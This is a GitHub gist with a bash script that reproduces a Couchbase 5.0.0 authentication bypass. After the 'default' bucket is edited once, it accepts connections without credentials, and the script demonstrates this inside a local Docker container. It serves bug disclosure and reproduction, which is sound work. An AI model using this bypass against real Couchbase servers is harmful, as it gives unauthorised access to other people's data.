Skip to content

Instantly share code, notes, and snippets.

@sublee

sublee/cb5-edit-to-free.sh

Created December 8, 2017 07:21
Show Gist options
  • Save sublee/e09980a27c93336678d3eed84830e1b4 to your computer and use it in GitHub Desktop.
Save sublee/e09980a27c93336678d3eed84830e1b4 to your computer and use it in GitHub Desktop.
Download ZIP
Couchbase 5.0.0 "edit-to-free" Security Bug
Raw
cb5-edit-to-free.sh
#!/bin/bash
#
# Couchbase 5.0.0 "edit-to-free" Security Bug
# ===========================================
#
# Couchbase 5 introduced RBAC. So clients always have to provide an
# authentication to use access on any bucket. But in case of the 'default'
# bucket, if we edit the bucket once, clients can access without
# authentication.
#
# Heungsub Lee <[email protected]>
#
set -euo pipefail
# only 'default' bucket has this problem
CB_BUCKET='default'
# create new couchbase 5.0
docker run -d --name=cb5 \
-p 8091-8094:8091-8094 -p 11210:11210 \
couchbase:enterprise-5.0.0
trap finalize EXIT
finalize() {
docker rm -f cb5
}
# wait for couchbase ready
sleep 10
# init new cluster
docker exec cb5 mkdir -p /data/data
docker exec cb5 mkdir -p /data/index
docker exec cb5 chown couchbase /data/data
docker exec cb5 chown couchbase /data/index
docker exec cb5 /opt/couchbase/bin/couchbase-cli node-init \
--cluster='127.0.0.1:8091' \
--user='Administrator' \
--password='password' \
--node-init-data-path='/data/data' \
--node-init-index-path='/data/index'
docker exec cb5 /opt/couchbase/bin/couchbase-cli cluster-init \
--cluster='127.0.0.1:8091' \
--cluster-username='Administrator' \
--cluster-password='PaSsWoRd' \
--cluster-port='8091' \
--cluster-ramsize='512' \
--cluster-index-ramsize='256' \
--cluster-fts-ramsize='256' \
--index-storage-setting='default' \
--services='data,index,query'
docker exec cb5 /opt/couchbase/bin/couchbase-cli setting-cluster \
--cluster='127.0.0.1:8091' \
--user='Administrator' \
--password='PaSsWoRd' \
--cluster-name='test'
# create new bucket 'default'
docker exec cb5 /opt/couchbase/bin/couchbase-cli bucket-create \
--cluster='127.0.0.1:8091' \
--user='Administrator' \
--password='PaSsWoRd' \
--bucket="$CB_BUCKET" \
--bucket-ramsize='512' \
--bucket-replica='0' \
--bucket-type='couchbase' \
--bucket-priority='high' \
--bucket-eviction-policy='fullEviction' \
--enable-flush='1' \
--enable-index-replica='0' \
--conflict-resolution='sequence' \
--wait
# 1. not possible to get bucket without auth
echo
echo '========================================================================'
echo ' 1. not possible to get bucket without auth'
echo '========================================================================'
cat <<EOF | python || true
from couchbase.bucket import Bucket
print(Bucket('couchbase://127.0.0.1/$CB_BUCKET'))
EOF
# 2. edit bucket
echo
echo '========================================================================'
echo ' 2. edit bucket'
echo '========================================================================'
docker exec cb5 /opt/couchbase/bin/couchbase-cli bucket-edit \
--cluster='127.0.0.1:8091' \
--user='Administrator' \
--password='PaSsWoRd' \
--bucket="$CB_BUCKET"
# 3. now we can get bucket without auth
echo
echo '========================================================================'
echo ' 3. now we can get bucket without auth'
echo '========================================================================'
# if the problem is not reproduced, here fails with non-zero exit code.
cat <<EOF | python
from couchbase.bucket import Bucket
print(Bucket('couchbase://127.0.0.1/$CB_BUCKET'))
EOF
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment